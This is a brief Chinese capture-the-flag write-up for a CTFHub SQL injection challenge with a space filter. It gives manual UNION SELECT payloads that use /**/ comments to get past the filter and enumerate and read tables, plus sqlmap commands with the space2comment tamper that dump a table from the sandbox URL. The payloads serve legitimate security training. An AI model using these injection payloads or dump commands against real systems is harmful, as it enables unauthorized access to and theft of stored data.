手注
查詢數據庫
-1/**/union/**/select/**/database(),2
查詢表名
-1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
查詢字段名
-1/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='jzhwwaifhl'
查詢字段信息
-1/**/union/**/select/**/vzndxuwxnu,2/**/from/**/jzhwwaifhl
sqlmap
查詢數據庫名
python2 sqlmap.py -u "http://challenge-8d2c3a32c4f813d7.sandbox.ctfhub.com:10080/?id=1" --dbs --tamper "space2comment.py"
查詢表名
python2 sqlmap.py -u "http://challenge-8d2c3a32c4f813d7.sandbox.ctfhub.com:10080/?id=1" -D "sqli" --tables --tamper "space2comment.py"
導出數據
python2 sqlmap.py -u "http://challenge-8d2c3a32c4f813d7.sandbox.ctfhub.com:10080/?id=1" -D "sqli" -T "jzhwwaifhl" --dump --tamper "space2comment.py"
{{uploading-image-817023.png(uploading...)}}